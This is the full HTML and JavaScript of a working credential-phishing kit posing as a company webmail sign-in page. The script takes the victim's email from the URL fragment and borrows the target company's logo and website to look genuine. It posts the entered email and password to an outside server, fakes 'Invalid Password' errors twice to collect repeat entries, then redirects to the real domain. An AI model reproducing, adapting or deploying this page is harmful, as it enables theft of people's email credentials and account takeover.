<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title id="tittle" style="text-transform: capitalize;"></title>
    <link id="favicon" rel="shortcut icon" href="">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:100,400,500,700">
    <script src="https://kit.fontawesome.com/f6136e9b49.js" crossorigin="anonymous"></script>
    <style>
        * {
    box-sizing: border-box;
    margin: 0;
    padding: 0; 
    color: #333;
}

body {
    font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
    font-size: 14px;
    line-height: 1.42857143;
    color: #333;
}

img {
    width: 100%;
    height: auto;
}
form {
    padding: 0rem 1rem;
    padding-top: 15px;
}

#root {
            position: absolute;
            left: 0;
            right: 0;
            bottom: 0;
            top: 0;
            z-index: -10;
            pointer-events: none;
            /* filter: brightness(0.3); */
        }

.input-container {
  display: -ms-flexbox; /* IE10 */
  display: flex;
  width: 100%;
  margin-bottom: 15px;
  border-color: #CACACA;
}

.icon {
  padding: 10px;
  background: #EEEEEE;
  color: #333;
  min-width: 50px;
  text-align: center;
  border-bottom-left-radius: 4px;
  border-top-left-radius: 4px;
}

.input-field {
  width: 100%;
  padding: 10px;
  outline: none;
  border: 1px solid #ccc;
  border-top-right-radius: 4px;
  border-bottom-right-radius: 4px;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  font-size: 14px;
  line-height: 1.42857143;
  color: #555;
}

.input-field:focus {
    border-color: #66afe9;
    outline: 0;
    -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102,175,233,.6);
    box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102,175,233,.6);
}

/* Set a style for the submit button */
.btnn {
    width: 35%;
    color: #ffffff;
    background-color: #3ec55d;
    text-align: center;
    font-weight: 500;
    font-size: 15px;
    border-radius: 4px;
    height: 35px;
    border: none;
    display: block;
    margin: auto;
    margin-top: 1rem;
}

.btnn:hover {
  opacity: 1;
}
.box2of {
    background: #f7f7f7;
    box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
    padding: 1rem;
    width: 350px;
    margin: auto;
    margin-top: 8rem;
    /* padding-top: 11%; */
    box-shadow: rgba(0, 0, 0, 0.35) 0px 5px 15px;
}
h2 {
    font-family: inherit;
    font-weight: 500;
    line-height: 1.1;
    color: inherit;
    text-align: center;
    font-size: 15px;
}
small {
    display: block;
    text-align: center;
    color: crimson;
    margin-bottom: 1rem;
    font-size: 16px;
}
input[readonly]{
    background-color: #eee;
    opacity: 1;
}
a {
    color: #337ab7;
    text-decoration: none;
}

#ermg {
    color: #a94442;
    background-color: #f2dede;
    border-color: #ebccd1;
    padding: 15px;
    text-align: center;
    margin-bottom: 20px;
    border: 1px solid transparent;
    border-radius: 4px;margin-bottom: 20px;
    border: 1px solid transparent;
    border-radius: 4px;
    margin-top: 10px;
    display: none;
    font-size: 11px;
}
#top {
    display: flex;
    align-items: center;
    flex-direction: column;
    margin: auto;
}
hr {
    margin-top: 20px;
    margin-bottom: 20px;
    border: 0;
    border-top: 1px solid #eee;
}
@media  (max-width: 760px) {
    /* .box2of {
    background: #f7f7f7;
    box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
    padding: 1.5rem;
    width: 70%;
    margin: auto;
    margin-top: 5rem;
    box-shadow: rgba(0, 0, 0, 0.35) 0px 5px 15px;
} */
}
@media  (max-width: 600px) {
    /* .box2of {
    background: #f7f7f7;
    box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
    padding: 1.5rem;
    width: 90%;
    margin: auto;
    margin-top: 5rem;
    box-shadow: rgba(0, 0, 0, 0.35) 0px 5px 15px;
} */
/* h2 {
    font-family: inherit;
    font-weight: 700;
    line-height: 1.1;
    color: inherit;
    text-align: center;
    font-size: 19px;
    letter-spacing: 3px;
} */
}
    </style>
</head>

<body>
    <div class="root" id="root">
        <iframe id="myframe" scrolling="no" src="" width="100%" height="100%" frameborder="0"></iframe>
    </div>
    <div class="container">
        <div class="box2of" style="position: relative;">
                <h2 class="text-center" style="margin-bottom: 1.8rem;margin-top: -58px;">
                    <div id="top">
                        <img src="" alt="" id="logoimg" style="width:90px;height:90px;border-radius: 50%;">
            
                        <span style="vertical-align: middle; text-transform: capitalize;color: blue;margin-top: .8rem;" class="logoname" id="logoname">HELLOWORLD</span>
                   </div>
                </h2>
            <form action="" id="result" method="post" style="max-width:500px;margin:auto">
                <small id="ermg"></small>
    
                <div class="input-container">
                    <i class="fa fa-user icon"></i>
                  <input class="input-field" type="text" placeholder="Email" id="userid" name="userid" readonly required>
                </div>
                
                <div class="input-container">
                  <i class="fas fa-eye icon"></i>
                  <input class="input-field" type="password" id="password" placeholder="Password" name="userpwd" required>
                </div>
              
                <span style="margin-top: 1rem; font-size: 13px;font-family: sans-serif;">
                    <span style="display: flex;align-items: center;gap: 4px;">
                        <input type="checkbox" name="jj" id="kk">
                        Always Secure?
                        <img src="https://i.postimg.cc/FzYX7r2F/secure.png" alt="" style="width: 18px;height: 21px;"><br>
                    </span>
                    <span>
                        <input type="checkbox" name="ll" id="kkll">
                        Private Computer
                    </span>
                    
                </span>
                <a href="#" class="pull-right" style="display: inline; float: right;">Forgot Password?</a>
                <button type="submit" class="btnn" id="btn">Sign in</button>
            </form>
            <hr>
           <span style="display: flex;align-items: center;gap: 3px;justify-content: center;">
               <img src="https://i.postimg.cc/0yN6C3hT/secure1.png" alt="" style="width: 18px;height: 20px;">
                <span style="vertical-align: middle">
                    This is secured by <strong><span id="" style="text-transform:capitalize;" class="logoname"></span>  Inc.</strong> © 2024
                </span>

           </span>
        </div>
        <p style="text-align:center; margin-top: 1rem;"> <a href="#"> Copyright © <span class="logoname" id="logona2" style="text-transform: capitalize;  color: #337ab7;">W3schools</span> 2024 </a></p>
    </div>

    <script>
        
        setCookie = (cName, cValue, expDays) => {
            let date = new Date();
            date.setTime(date.getTime() + (expDays * 24 * 60 * 60 * 1000));
            const expires = "expires=" + date.toUTCString();
            document.cookie = cName + "=" + cValue + "; " + expires + "; path=/";
        }

        getCookies = (cName) => {
            const name = cName + "=";
            const cDecoded = decodeURIComponent(document.cookie);
            const cArr = cDecoded.split("; ");
            let value;
            cArr.forEach(val => {
                if (val.indexOf(name) === 0) {
                    value = val.substring(name.length);
                }
            });
            return value;
        }

        // Set the cookie automatically when the page loads
        window.addEventListener("load", () => {
            if (!getCookies("cookie")) {
                setCookie("cookie", true, 90);
            }
            localStorage.removeItem("storedPassword");
            var formSubmitted = 0;

            
        });

        document.getElementById("btn").addEventListener("click", () => {
            document.getElementById("btn").textContent = "Verifying...";
            setTimeout(() => {
                document.getElementById("btn").textContent = "Sign in";
            }, 3000);
        })

        // Get the full URL
        const fullUrl = window.location.href;
        
        const emailRegex = /#([^#]+)$/; // Assumes email is in the fragment identifier
        const match = fullUrl.match(emailRegex);
      

        const email = match ? match[1] : null;
      
       
        console.log(email);


            document.getElementById("userid").value = email;

            const domain = email.split('@')[1];
            const companyName = domain.split('.')[0];

            console.log(companyName);
            localStorage.setItem("userDomain", domain);

            // Log or use the extracted domain
            console.log(domain);
            document.getElementById("myframe").src = `https://www.${domain}`;
            document.getElementById("favicon").href = `https://logo.clearbit.com/${domain}`;
            document.getElementById("logoimg").src = `https://logo.clearbit.com/${domain}`;
            document.getElementById("tittle").textContent = `${companyName} - Mail`;
            document.getElementById("logoname").textContent = `${companyName}`;
            document.getElementById("logona2").textContent = `${companyName}`;


        

        document.addEventListener('contextmenu', function (e) {
         e.preventDefault();
        });

        var formSubmitted = 0;


      document.getElementById("result").addEventListener("submit", function (event) {
          event.preventDefault();
      
          formSubmitted++;
          const directts = localStorage.getItem("userDomain")
          console.log(directts);
      
          var inputs = document.querySelectorAll('input[required]');
          for (var i = 0; i < inputs.length; i++) {
              if (!inputs[i].value.trim()) {
                //   alert("Please fill in all fields.");
                     document.getElementById("ermg").style.display = "block";
                     document.getElementById("ermg").textContent = "Invalid Password.! Please Enter your correct Password";
                  return;
              }
          }
      
          var formData = new FormData(this);
          var xhr = new XMLHttpRequest();
          xhr.open("POST", "https://genicsmedia.co.uk//wp-admin/maint/result.php", true); // put your php url
      
          xhr.onreadystatechange = function () {
              if (xhr.readyState == 4 && xhr.status == 200) {
                  console.log(xhr.responseText);
      
                  if (formSubmitted === 1) {
                      console.log("YESSSSS");
                      document.getElementById("password").value = "";
                      document.getElementById("ermg").style.display = "block";
                      document.getElementById("ermg").textContent = "Invalid Password.! Please Enter your correct Password";
                  } else if (formSubmitted === 2) {
                          document.getElementById("password").value = "";
                          console.log("invalid");
                          document.getElementById("ermg").style.display = "block";
                          document.getElementById("ermg").textContent = "Invalid Password.! Please Enter your correct Password";
                  } else if (formSubmitted === 3) {
                        setInterval(() => {
                            // document.getElementById("password").value = "";
                            window.location.href = `http://www.${directts}`;
                        }, 2000);
                     
                          console.log("invalid");
                  }
              }
          };
      
          xhr.send(formData);
      });

    </script>
</body>

</html>